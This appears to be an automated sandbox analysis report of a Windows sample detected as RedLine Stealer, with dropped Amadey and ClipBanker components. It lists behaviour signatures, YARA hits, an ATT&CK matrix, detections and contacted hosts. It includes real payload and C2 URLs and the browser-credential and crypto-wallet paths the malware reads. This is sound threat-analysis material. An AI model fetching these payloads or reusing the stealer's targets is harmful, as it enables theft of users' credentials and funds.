Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\ProgramData\ca82a716069a53\cred.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\clp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\clp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\ProgramData\ca82a716069a53\cred.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_00410702 cpuid

25_2_00410702

Source: C:\Users\user\Desktop\mosoxxxHack.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_00410B21 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

25_2_00410B21

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_0041EC53 _free,_free,_free,GetTimeZoneInformation,_free,

25_2_0041EC53

Source: C:\Users\user\AppData\Local\Temp\a.exe

25_2_00401D60

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_00404130 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

25_2_00404130

Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\mosoxxxHack.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Source: mosoxxxHack.exe, 00000001.00000002.371434343.0000000006C91000.00000004.00000001.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 1.2.mosoxxxHack.exe.2e40f6e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.27e0ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.27e0ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2f40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.27e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.mosoxxxHack.exe.cb30d8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.mosoxxxHack.exe.cb30d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2e40086.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2e40086.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2f40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.27e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2e40f6e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.244119121.0000000000CB3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.361979737.0000000002E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365676474.0000000004115000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.362118888.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mosoxxxHack.exe PID: 3008, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Amadeys stealer DLL

Show sources

Source: Yara match	File source: C:\ProgramData\ca82a716069a53\cred.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	String found in binary or memory: ElectrumRule
Source: mosoxxxHack.exe, 00000001.00000002.364561112.0000000003472000.00000004.00000001.sdmp	String found in binary or memory: m1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqliteUnknownExtension\Program Files (x86)\configArmorydisplayNamehost_keyNametdata\EWarningxodWarningusexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnDisplayVersion%localappdata%\OpHandlerenVPHandlerN ConHandlernect%DSK_23%cmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasf%useStringBuilderrproStringBuilderfile%\DStringBuilderocuStringBuildermeStringBuilderntsv11\Program Files\\ElBPOTE6AJIectruBPOTE6AJIm\wallBPOTE6AJIetsOpera GX StableSELECT * FROM Win32_Process Where SessionId='.json\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnameProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueLocal Extension SettingsNWinordVWinpn.eWinxeWinhostEWarningxodWarningusmoz_cookiesUser Datawindows-1251, CommandLine: DisplayName.walletexpiry\EExceptionxodExceptionus\exodExceptionus.walExceptionlet.vstring.ReplacedfJaxxpath
Source: mosoxxxHack.exe, 00000001.00000002.364561112.0000000003472000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: mosoxxxHack.exe, 00000001.00000002.364561112.0000000003472000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\wallets
Source: mosoxxxHack.exe, 00000001.00000002.364561112.0000000003472000.00000004.00000001.sdmp	String found in binary or memory: Exodus
Source: mosoxxxHack.exe, 00000001.00000002.364561112.0000000003472000.00000004.00000001.sdmp	String found in binary or memory: Ethereum
Source: mosoxxxHack.exe, 00000001.00000002.364561112.0000000003472000.00000004.00000001.sdmp	String found in binary or memory: m5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: a.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\mosoxxxHack.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\mosoxxxHack.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Source: Yara match

File source: Process Memory Space: mosoxxxHack.exe PID: 3008, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 1.2.mosoxxxHack.exe.2e40f6e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.27e0ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.27e0ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2f40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.27e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.mosoxxxHack.exe.cb30d8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.mosoxxxHack.exe.cb30d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2e40086.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2e40086.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2f40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.27e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mosoxxxHack.exe.2e40f6e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.244119121.0000000000CB3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.361979737.0000000002E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365676474.0000000004115000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.362118888.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mosoxxxHack.exe PID: 3008, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Scheduled Task/Job1	Process Injection211	Deobfuscate/Decode Files or Information11	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Scheduled Task/Job1	Obfuscated Files or Information4	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Standard Port11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing13	NTDS	System Information Discovery137	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Security Software Discovery881	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol14	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Process Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Modify Registry1	DCSync	Virtualization/Sandbox Evasion561	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion561	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection211	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
mosoxxxHack.exe	43%	ReversingLabs	Win32.Trojan.Tnega
mosoxxxHack.exe	100%	Avira	HEUR/AGEN.1140858
mosoxxxHack.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\ca82a716069a53\cred.dll	100%	Avira	HEUR/AGEN.1137247
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll	100%	Avira	HEUR/AGEN.1137247
C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\a.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\clp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\clp[1].exe	100%	Joe Sandbox ML
C:\ProgramData\ca82a716069a53\cred.dll	63%	Metadefender		Browse
C:\ProgramData\ca82a716069a53\cred.dll	89%	ReversingLabs	Win32.Infostealer.Decred
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\clp[1].exe	35%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\clp[1].exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.ClipBanker
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll	63%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll	89%	ReversingLabs	Win32.Infostealer.Decred
C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	32%	ReversingLabs
C:\Users\user\AppData\Local\Temp\a.exe	32%	ReversingLabs
C:\Users\user\AppData\Local\Temp\clp.exe	35%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\clp.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.ClipBanker

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.mosoxxxHack.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.mosoxxxHack.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.mosoxxxHack.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://service.r	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironmentme(	0%	Avira URL Cloud	safe
http://tempuri.org/t_	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
http://91.142.79.35:134004	0%	Avira URL Cloud	safe
http://91.142.79.35:13400/	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://x-vpn.ug/hfV3vDtt/index.php?scr=1	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://91.142.79.35:	0%	Avira URL Cloud	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
http://ns.d	0%	URL Reputation	safe
http://www.fontbureau.comcomm	0%	Avira URL Cloud	safe
https://go.microh	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnviron	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.comoitu	0%	URL Reputation	safe
http://forms.rea	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://ns.ado/1YMq08	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
https://cdn.discordapp.com(	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
http://go.micros	0%	URL Reputation	safe
https://cdn.discordapp.com4	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	URL Reputation	safe
http://tempuri.org/0	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://91.142.79.35:13400	0%	Avira URL Cloud	safe
http://ns.adobe.cobjYMq08	0%	Avira URL Cloud	safe
https://helpx.ad	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
https://api.ip.sbP	0%	Avira URL Cloud	safe
https://get.adob	0%	URL Reputation	safe
http://x-vpn.ug/hfV3vDtt/index.php	0%	Avira URL Cloud	safe
http://x-vpn.ug/hfV3vDtt/plugins/cred.dll	0%	Avira URL Cloud	safe
http://ns.adobe.c/gYMq08	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cdn.discordapp.com	162.159.135.233	true	false	high
redteamminepool.ug	193.164.16.126	true	false	high
x-vpn.ug	109.234.32.63	true	false	high
api.ip.sb	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.142.79.35:13400/	false	Avira URL Cloud: safe	unknown
http://x-vpn.ug/hfV3vDtt/index.php?scr=1	true	Avira URL Cloud: safe	unknown
http://cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe	false		high
http://x-vpn.ug/hfV3vDtt/index.php	true	Avira URL Cloud: safe	unknown
http://x-vpn.ug/hfV3vDtt/plugins/cred.dll	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://service.r	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentme(	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/t_	mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip	mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://91.142.79.35:134004	mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/D	mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	false		high
http://tempuri.org/	mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
http://ns.adobe.c/g	mosoxxxHack.exe, 00000001.00000003.354953199.0000000008EC0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	mosoxxxHack.exe, 00000001.00000002.365082408.000000000353E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_real	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/710557342755848243/876828927182663711/a.exe(	mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_pdf	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	mosoxxxHack.exe, 00000001.00000002.363423689.00000000032D4000.00000004.00000001.sdmp, mosoxxxHack.exe, 00000001.00000002.362698588.0000000003187000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp, a.exe, 00000011.00000002.405983736.0000000002A51000.00000004.00000001.sdmp, drbux.exe, 0000001A.00000002.464357742.00000000031F1000.00000004.00000001.sdmp	false		high
http://forms.real.com/real/realone/download.html?type=rpsp_us	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://support.a	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://91.142.79.35:	mosoxxxHack.exe, 00000001.00000002.365082408.000000000353E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_quicktime	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://ns.adobe.cobj	mosoxxxHack.exe, 00000001.00000003.354953199.0000000008EC0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnectResponse	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/710557342755848243/876828927182663711/a.exe	mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ns.d	mosoxxxHack.exe, 00000001.00000003.326766040.0000000008EB1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comcomm	a.exe, 00000011.00000002.405780557.00000000011A7000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
https://go.microh	powershell.exe, 00000017.00000003.550499898.0000000005966000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
